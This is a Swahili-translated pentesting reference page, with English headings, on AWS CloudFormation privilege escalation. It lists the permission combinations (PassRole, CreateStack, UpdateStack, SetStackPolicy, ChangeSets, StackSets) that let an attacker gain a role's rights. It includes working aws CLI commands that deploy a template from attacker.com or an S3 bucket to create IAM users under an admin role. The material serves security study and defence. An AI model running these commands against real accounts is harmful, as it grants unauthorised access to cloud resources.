AWS - Cloudformation Privesc

cloudformation

Kwa maelezo zaidi kuhusu cloudformation angalia:

iam:PassRole, cloudformation:CreateStack

Mshambuliaji mwenye ruhusa hizi anaweza kuongeza mamlaka kwa kutunga CloudFormation stack na kiolezo maalum, kilichohifadhiwa kwenye seva yao, ili kutekeleza vitendo chini ya ruhusa za jukumu lililobainishwa:

aws cloudformation create-stack --stack-name <stack-name> \
--template-url http://attacker.com/attackers.template \
--role-arn <arn-role>

Katika ukurasa ufuatao una mfano wa exploitation na ruhusa ya ziada cloudformation:DescribeStacks:

Athari Zinazoweza Kutokea: Privesc kwa huduma ya cloudformation iliyoainishwa.

iam:PassRole, (cloudformation:UpdateStack | cloudformation:SetStackPolicy)

Katika kesi hii unaweza kudhulumu stack ya cloudformation iliyopo ili kuisasaisha na kupandisha ruhusa kama ilivyo katika hali ya awali:

aws cloudformation update-stack \
--stack-name privesc \
--template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
--role arn:aws:iam::91029364722:role/CloudFormationAdmin2 \
--capabilities CAPABILITY_IAM \
--region eu-west-1

The cloudformation:SetStackPolicy ruhusa inaweza kutumika kujipewe ruhusa ya UpdateStack juu ya stack na kufanya shambulio.

Athari Zinazoweza Kutokea: Privesc kwa huduma ya cloudformation iliyotajwa.

cloudformation:UpdateStack | cloudformation:SetStackPolicy

Ikiwa una ruhusa hii lakini hakuna iam:PassRole bado unaweza kusaidia stacks zilizotumika na kutumia IAM Roles walizo tayari wameambatanisha. Angalia sehemu ya awali kwa mfano wa exploit (usionyeshe jukumu lolote katika sasisho).

The cloudformation:SetStackPolicy ruhusa inaweza kutumika kujipewe ruhusa ya UpdateStack juu ya stack na kufanya shambulio.

Athari Zinazoweza Kutokea: Privesc kwa huduma ya cloudformation iliyotajwa tayari.

iam:PassRole,((cloudformation:CreateChangeSet, cloudformation:ExecuteChangeSet) | cloudformation:SetStackPolicy)

Mshambuliaji mwenye ruhusa za kupitisha jukumu na kuunda & kutekeleza ChangeSet anaweza kuunda/sasisha stack mpya ya cloudformation kutumia huduma za cloudformation kama ilivyo kwa CreateStack au UpdateStack.

Exploit ifuatayo ni tofauti ya CreateStack moja ikitumia ruhusa za ChangeSet kuunda stack.

aws cloudformation create-change-set \
--stack-name privesc \
--change-set-name privesc \
--change-set-type CREATE \
--template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
--role arn:aws:iam::947247140022:role/CloudFormationAdmin \
--capabilities CAPABILITY_IAM \
--region eu-west-1

echo "Waiting 2 mins to change the stack"
sleep 120

aws cloudformation execute-change-set \
--change-set-name privesc \
--stack-name privesc \
--region eu-west-1

echo "Waiting 2 mins to execute the stack"
sleep 120

aws cloudformation describe-stacks \
--stack-name privesc \
--region eu-west-1

The cloudformation:SetStackPolicy permission can be used to kujipa ruhusa za ChangeSet juu ya stack na kufanya shambulio.

Athari Zinazoweza Kutokea: Privesc kwa majukumu ya huduma ya cloudformation.

(cloudformation:CreateChangeSet, cloudformation:ExecuteChangeSet) | cloudformation:SetStackPolicy)

Hii ni kama njia ya awali bila kupitisha majukumu ya IAM, hivyo unaweza tu kutumia yale yaliyounganishwa tayari, badilisha tu parameter:

--change-set-type UPDATE

Madhara Yanayoweza Kutokea: Privesc kwa huduma ya cloudformation ambayo tayari imeunganishwa.

iam:PassRole,(cloudformation:CreateStackSet | cloudformation:UpdateStackSet)

Mshambuliaji anaweza kutumia ruhusa hizi kuunda/update StackSets ili kutumia majukumu ya cloudformation yasiyo na mipaka.

Madhara Yanayoweza Kutokea: Privesc kwa majukumu ya huduma ya cloudformation.

cloudformation:UpdateStackSet

Mshambuliaji anaweza kutumia ruhusa hii bila ruhusa ya passRole kuupdate StackSets ili kutumia majukumu ya cloudformation yaliyounganishwa.

Madhara Yanayoweza Kutokea: Privesc kwa majukumu ya cloudformation yaliyounganishwa.

Marejeleo

• https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/